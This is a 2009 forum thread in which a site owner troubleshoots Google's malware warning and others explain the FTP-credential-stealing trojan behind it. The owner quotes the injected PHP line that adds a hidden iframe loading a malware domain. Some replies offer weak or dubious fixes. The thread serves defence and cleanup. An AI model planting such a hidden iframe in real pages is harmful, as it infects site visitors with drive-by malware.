Google warning "This site may harm your computer."

[severus]

Hi all,

Two days ago, Google show this warning on my site: "This site may harm your computer" but I really don't distribute any malware, virus or any thing like that. This thing decrease my traffic seriously.

Here is information from Google Safe Browsing:

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-07-03, and the last time suspicious content was found on this site was on 2009-07-03.
Malicious software is hosted on 1 domain(s), including maislex.net/.
This site was hosted on 1 network(s) including AS26496 (PAH).


My site was hosted in GoDaddy hosting.

How can I solve this problem?

Thanks in advance.

[livePR.ezer.com]

It happens to many sites.

It was good you found the message by yourself.

way 1. Research again.
way 2. My friend Tony told me to click the link and link to your site with a browser has Google tool bar.

The message shall disappear.


Regards,

[severus]

Thanks for your quick reply.

I did as your instruction but this problem still occurs.

Currently, I didn't use any anti virus in my laptop so I think my hosting can be infected virus from my laptop. Should I install new anti virus program and scan all files in my hard drives, an re-upload my source code files into my host? Can it solve the problem?

[livePR.ezer.com]

Yahoo tool bar has an anti-spy you may try it.

[~kev~]

Quote:

Originally Posted by severus

Hi all,

How can I solve this problem?

Thanks in advance.

Stop serving up malware and drive by infects - that is how you fix the problem. Google does not issues those warnings just for the "fun of it". There is a problem with your site and you need to fix it.

[severus]

I have checked all my source code files in GoDaddy hosting. All index.php files of all my sites had been added one more line of code as below:

<?php
echo "<iframe src=\"http://maislex.net/?click=63B3ED\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>

But my source code files in my laptop don't have this code. I think GoDaddy hosting has been infected virus. It's really unbelievable.

I have deleted this line of code and re-upload to hosting, but I am not sure this problem can't occur again

Is there any solution to solve it absolutely?

[livePR.ezer.com]

Did your site install a forum or blogger script ?

[severus]

Quote:

Originally Posted by livePR.ezer.com

Did your site install a forum or blogger script ?

No, I don't use forum or blogger script at all. I developed by myself. I have use Google Web Master tool to request Google review my sites. Hope it better.

[livePR.ezer.com]

hi

google has some info here

google.com/safebrowsing/diagnostic?site=maislex.net/

BTW
you may use the tool check your site
google.com/safebrowsing/diagnostic?site= your site

[WeWatch]

The maislex.net type of website infection is an off-shoot of the martuz/gumblar infections. It's usually the result of a virus/trojan on one of the PCs used to update the website.

What it does is scans your PC looking for any stored username and passwords. If it finds them in FTP software, it sends them and the IP of the website(s) to a server. That server then connects to the website, with the stolen FTP credentials, injects it's infectious code and then starts checking it to see if you've removed their code. If you have, then it tries to re-inject it.

Steps you should take:

1. Scan all PCs with a new anti-virus program. Whatever you're using now isn't good enough because this virus already knows how to hide from it. If you're using AVG, try Avast or Avira. If you're using McAfee, use AVG. You need to use a different AV program than what you were using when you became infected.

2. After scanning and cleaning all PCs that connect via FTP to your website, change the FTP password to your site. Change all of them if you have more than one username.

3. Download your site, scan every file for malicious code. Anything that you didn't put there should be removed because the cybercriminals are very good at obfuscating their malware. If you need help finding all the malicious scripts in your site, post the name of your site here and we'll help you.

4. Re-upload your site.

5. Login to Google webmasters tools and request a review of your site. If it's clean, Google will then remove that warning. You may have to verify your site with Google before you can request a review. Follow their steps and you'll be fine.

Post back here with your results or questions so that others may learn from your experience.

[~kev~]

Quote:

Originally Posted by severus

But my source code files in my laptop don't have this code. I think GoDaddy hosting has been infected virus. It's really unbelievable.

Chances are you have a key logger installed on your laptop. The hacker was able to record your key strokes and then was able to access your server and make the changes to your pages.

Notify godaddy and ask them to do a security audit of the server.

And you do a security audit of your laptop. If you are not sure on how to audit your own system, you may want to contact a computer tech in your area and have them do it for you.

[WeWatch]

GoDaddy will tell him that it's not their problem.

If the OP has a virus or trojan on their laptop, and that virus/trojan steals their username and password and then logs in as them, injects infectious code into their site, it's not GoDaddy's issue. The responsibility lies with the website owner.

This virus works in 2 ways:

First, it scans all the files of the local PC looking for which FTP software is used. It knows where to look for such popular programs as: Dreamweaver, FrontPage, FileZilla, WS_FTP and many others. Then it checks the files where usernames and passwords are stored so the user doesn't have to enter them each time they want to FTP to the site. It steals those, sends them to a server which them modifies the code on the site.

Second way it works is, it "sniffs" the outgoing FTP traffic. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus/trojan to see the username and password being transmitted, records it and sends it to a server which then injects it's malscripts into the website in various places.

Sorry to seem argumentative, but it's not technically a keyboard logger - yet. Maybe next month's version of this virus will be as we've been telling people to move away from FTP and use either SFTP or FTPS both of which encrypt all their data transmitted.

[~kev~]

Quote:

Originally Posted by WeWatch

GoDaddy will tell him that it's not their problem.

If the OP has a virus or trojan on their laptop, and that virus/trojan steals their username and password and then logs in as them, injects infectious code into their site, it's not GoDaddy's issue. The responsibility lies with the website owner.

We have no real evidence to prove that his laptop is infected with anything. All we are doing is speculating as to what "might" be the problem.

And I disagree about godaddys repsonsibility. The hosting provider should audit the server to make sure no other breaches have been done.

We do not know if the server OS is up to date, is apache up to date, is mysql up to date, is php up to date,,,,,? As far as I know, godaddy is using a version of red hat that is 10 years old and can be hacked by a 10 year old kid. Or is this a windows 2000 server that has not been updated in 9 years?

There are too many factors to point the finger with no real evidence.

[mit]

Actually, if you have this kind of problem, just must need to have an account on Google webmaster tools. From there, you can get the basic problem / problematic URL and then you can find and fix the problem.

[tcyonline.com]

Hi,
I have also faced same type of problems with my previous websites where I was working. I have taken all source code back up and scan it with an anti virus and hosted it to the same server....after that my problems have been solved and also message was not there.

[bermuda]

The recent problem has been noticed on thousands of computers worldwide and it is a Trojan attacking computers and then it will affect the FTP applications.

When you upload the Index files, an Iframe will be added to that. Scan your computer with as many programs as you can and then reupload the pages.

[livePR.ezer.com]

I do think Safe Browsing is an important issue.

So based on Google safe browsing diagnostic I just made and wanted to share the safe site checker.

[Sheikh Ahsan]

I am also facing this problem, i need to download a forum for attestation and when i search from google it says harmful site... and i cant open its!! tried many tricks but still i m unable to surf it! Need help!!

[umesh]

Quote:

Originally Posted by Sheikh Ahsan

I am also facing this problem, i need to download a forum for attestation and when i search from google it says harmful site... and i cant open its!! tried many tricks but still i m unable to surf it! Need help!!

Hi,
This is trojan virus better to take your back up your uploaded files and scan your files with updated anti virus and reupload all the file. Your problem will be fixed.

[Sheikh Ahsan]

Umesh yes it was the trojan virus........... infact it infected my whole computer i m reintalling the windows!! but thanks for helppppp maan!!
cheers!